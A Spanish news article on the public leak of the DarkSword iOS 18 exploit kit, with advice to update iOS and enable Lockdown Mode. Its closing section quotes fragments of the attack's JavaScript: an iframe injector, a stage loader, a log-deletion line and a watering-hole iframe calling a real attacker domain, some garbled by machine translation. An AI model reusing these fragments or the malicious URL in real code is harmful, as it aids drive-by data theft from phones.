Filtran una versión actualizada de DarkSword en GitHub: el ‘exploit’ que roba datos en iPhone accesible para cualquiera

Juan Cascón Baños

hace 3 horas

Filtran una versión actualizada de DarkSword en GitHub: el 'exploit' que roba datos en iPhone accesible para cualquiera

Categorías: Destacada, Sin categoría, Tecnología

Os dejamos una noticia de seguridad. Recomendamos actualizar el iPhone a la última versión. Filtran una versión actualizada de DarkSword en GitHub: el ‘exploit’ que roba datos en iPhone accesible para cualquiera.

DarkSword, el exploit que compromete iPhones con iOS 18, fue publicado en GitHub. Cualquiera puede usarlo sin conocimientos técnicos. El kit de exploits DarkSword saltó a la luz pública la semana pasada, cuando investigadores en ciberseguridad documentaron una campaña de hacking dirigida contra usuarios de iPhone.

Una versión actualizada del ‘exploit’ dirigido a dispositivos iPhone conocido como DarkSword se ha filtrado en el repositorio de código de GitHub, de manera que está disponible de forma pública y cualquiera puede utilizarlo para atacar a usuarios de iPhone que utilicen versiones antiguas de iOS 18 y robar todos sus datos.

En resumen, ambos exploits se basan en WebKit y otras vulnerabilidades que Apple corrigió recientemente con iOS 16.7.15, iOS 15.8.7, iPadOS 16.7.15 y iPadOS 15.8.7, lo que permite a los atacantes robar datos de usuario u obtener el control total de un dispositivo.

Tras la revelación de ambas vulnerabilidades, Apple publicó un documento de soporte en el que destacaba la importancia de mantener los dispositivos actualizados, incluso si no pueden ejecutar iOS 26 o iPadOS 26. Apple también añadió que el Modo Bloqueo puede reducir aún más los intentos de pirateo.

Tras hacerse públicas estas dos vulnerabilidades, Apple difundió un documento de soporte en el que subrayaba la necesidad de mantener los dispositivos al día, incluso aquellos que no pueden actualizarse a iOS 26 o iPadOS 26. Asimismo, la compañía indicó que activar el Modo Bloqueo puede servir como una capa adicional de protección frente a intentos de intrusión.

Por su parte, DarkSword es un software malicioso orientado a iPhone que se aprovecha de hasta seis fallos de seguridad de tipo “día cero” presentes en versiones del sistema entre iOS 18.4 y iOS 18.7. Mediante este método, los atacantes pueden extraer información del dispositivo simplemente con que el usuario acceda a una página web, incluyendo mensajes, registros de llamadas, ubicación o incluso monederos de criptomonedas.

Este exploit es capaz de tomar el control de procesos legítimos del sistema operativo, sustraer datos en cuestión de minutos y borrar cualquier rastro tras completar la operación. Así lo señalaron recientemente el Grupo de Inteligencia de Amenazas de Google (GTIG), junto con las compañías de ciberseguridad iVerify y Lookout.

En este contexto, el código de DarkSword ha terminado expuesto públicamente en GitHub, lo que facilita que cualquier actor malicioso pueda utilizarlo con rapidez para atacar a usuarios que sigan empleando versiones vulnerables de iOS 18.

Tal y como han confirmado investigadores de iVerify y ha explicado su cofundador, Matthias Frielingsdorf, en declaraciones a TechCrunch, el material compartido corresponde a una versión actualizada del exploit. Aunque presenta ligeras modificaciones, mantiene la misma base técnica que la analizada previamente.

Según estas fuentes, el contenido publicado en GitHub está compuesto por código relativamente simple en HTML y JavaScript, acompañado de explicaciones sobre el funcionamiento de las vulnerabilidades y la forma de explotarlas.

Precisamente esta simplicidad hace posible que cualquier persona pueda replicar el ataque y desplegarlo en un servidor en muy poco tiempo, sin necesidad de conocimientos avanzados sobre iOS. Como consecuencia, se incrementa el riesgo de ataques dirigidos a usuarios para el robo de información.

Frielingsdorf ha calificado la filtración como especialmente preocupante, al considerar que el código es “demasiado fácil de reutilizar”, y ha advertido de que será difícil frenar su difusión. En su opinión, es previsible que distintos actores maliciosos comiencen a emplearlo.

En la misma línea se ha pronunciado Kimberly Samra, portavoz de Google, quien ha señalado a TechCrunch que los investigadores del GTIG también consideran esta situación como un escenario de riesgo elevado.

De hecho, ya se han observado pruebas de su facilidad de uso. Un usuario conocido como Matteyeux publicó en X que, utilizando el código filtrado, consiguió obtener permisos de lectura y escritura a nivel de kernel en un iPad mini de sexta generación con iOS 18.6.2.

NECESARIO ACTUALIZAR A IOS 26

A la luz de estos hechos, los especialistas en ciberseguridad insisten en que resulta más importante que nunca instalar la última versión del sistema operativo, iOS 26, ya que incorpora los parches que neutralizan las vulnerabilidades aprovechadas por esta herramienta maliciosa.

Cuando se analizó por primera vez DarkSword, la firma iVerify señaló que las versiones afectadas de iOS 18 seguían activas en cerca de 270 millones de dispositivos en todo el mundo. En este sentido, la portavoz de Apple, Sarah O’Rourke, indicó al medio citado que la compañía es consciente del problema y que el miércoles 11 de marzo lanzó una actualización urgente destinada a aquellos equipos que no pueden acceder a las versiones más recientes del sistema.

O’Rourke también afirmó que, una vez aplicado el software actualizado, los iPhone quedan protegidos frente a este riesgo. Además, recordó que existen mecanismos adicionales de defensa, como el Modo Bloqueo, que contribuyen a mitigar este tipo de amenazas.

Conviene destacar que, en el momento en que se detectó este exploit, los investigadores comprobaron que ya había sido empleado por empresas de vigilancia comercial y por supuestos actores vinculados a estados en operaciones de espionaje.

En concreto, se documentó el uso de DarkSword en ataques dirigidos a objetivos situados en países como Arabia Saudí, Turquía, Malasia o Ucrania, atribuidos al grupo UNC6353, presuntamente de origen ruso. No obstante, al haberse hecho público su código, el riesgo aumenta considerablemente, ya que cualquier ciberdelincuente puede adaptarlo y utilizarlo con fines propios para sustraer información.

Os dejamos la exlicación técnica de como funciona https://hackyourmom.com/en/novyny/60814/y https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain

DarkSword ataca iOS 18.4–18.7 y encadena seis vulnerabilidades para comprometer completamente un dispositivo. Tras la infección, se despliega una de tres cargas útiles: GHOSTBLADE, GHOSTKNIFE o GHOSTSABER.

Cronología de las observaciones y parches de vulnerabilidad de DarkSword

El ataque comienza con una página web maliciosa, a menudo disfrazada de un servicio legítimo como Snapchat. JavaScript comprueba el dispositivo y activa la siguiente etapa:

if ( !sessionStorage. getItem ( «uid» ) && isTouchScreen ) {

sessionStorage.setItem ( «uid» , ‘ 1′ ) ;

const frame = document.createElement ( » iframe» ) ;

frame.src = «frame.html?» + Math.random ( ) ;

documento.cuerpo.appendChild ( marco ) ;

}

Esto inicia la cadena de exploits.

El cargador luego obtiene las etapas del exploit:

< code class = «language-javascript» > function getJS ( fname ) {

let xhr = new XMLHttpRequest () ;

xhr.open ( «GET» , fname, false ) ;

xhr.send ( null ) ;

devolver xhr.responseText ;

}

</code>

Selecciona dinámicamente el exploit correcto:

if ( ios_version == ‘18,7’ ) workerCode = getJS ( `rce_worker_18. 7 . js ` ) ; else workerCode = getJS ( `rce_worker_18. 6 . js ` ) ;

Los actores más avanzados utilizan cifrado:

const keyPair = generateKeyPair () ; const encrypted = self.btoa ( exportPublicKeyAsPem ( keyPair.publicKey ) ) ;

Tras la ejecución remota de código (RCE) a través de JavaScriptCore, el exploit escapa del entorno aislado, se propaga a través de los procesos del sistema y eleva los privilegios hasta el nivel del kernel.

La carga útil final opera de forma sigilosa, eliminando los registros:

if ( file.includes ( «SpringBoard» ) || file.includes ( «WebKit» )) { deleteFileAtPath ( file ) ; }

En las campañas centradas en Ucrania, UNC6353 utilizó ataques de tipo «waterpoint» (punto de encuentro para los delincuentes):

const iframe = document.createElement ( » iframe» ) ; iframe.src = «https://static.cdncounter.net/assets/index.html » ; documento.cuerpo.appendChild ( iframe ) ;

Un comentario en ruso en el código sugiere la atribución:

“// если uid всё ещё нужен — просто устанавливаем”

Posteriormente, las cargas útiles extraen mensajes, contactos, datos del navegador, credenciales de Wi-Fi, datos de ubicación, archivos y más. Los módulos avanzados permiten la grabación de audio y la ejecución de comandos.

DarkSword sigue la línea de kits de exploits anteriores como Coruna, pero demuestra una nueva tendencia: su rápida proliferación entre múltiples actores, lo que indica un ecosistema de exploits comerciales en expansión. DarkSword pone de manifiesto la creciente accesibilidad de exploits avanzados para dispositivos móviles.

Las cadenas de ataques de alta gama ya no son exclusivas y ahora se reutilizan ampliamente. Actualizar iOS, activar el Modo Bloqueo y evitar enlaces sospechosos siguen siendo medidas de seguridad fundamentales.

Fuente: https://techcrunch.com/2026/03/23/someone-has-publicly-leaked-an-exploit-kit-that-can-hack-millions-of-iphones/

. Leer artículo completo en Frikipandi Filtran una versión actualizada de DarkSword en GitHub: el ‘exploit’ que roba datos en iPhone accesible para cualquiera.

Entradas recientes para Filtran una versión actualizada de DarkSword en GitHub: el ‘exploit’ que roba datos en iPhone accesible para cualquiera